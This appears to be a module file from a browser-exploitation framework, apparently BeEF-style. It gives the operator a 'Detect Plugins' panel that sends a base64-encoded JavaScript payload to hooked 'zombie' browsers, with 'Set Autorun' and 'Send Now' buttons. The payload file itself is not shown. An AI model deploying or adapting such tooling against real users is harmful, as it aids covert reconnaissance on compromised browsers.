DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_gp() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detect Plugins', get_b64_code_gp());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_gp());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Detect Plugins</div>
This module will retrieve the selected zombie browser plugins.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header"></div>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

Some files were not shown because too many files have changed in this diff Show More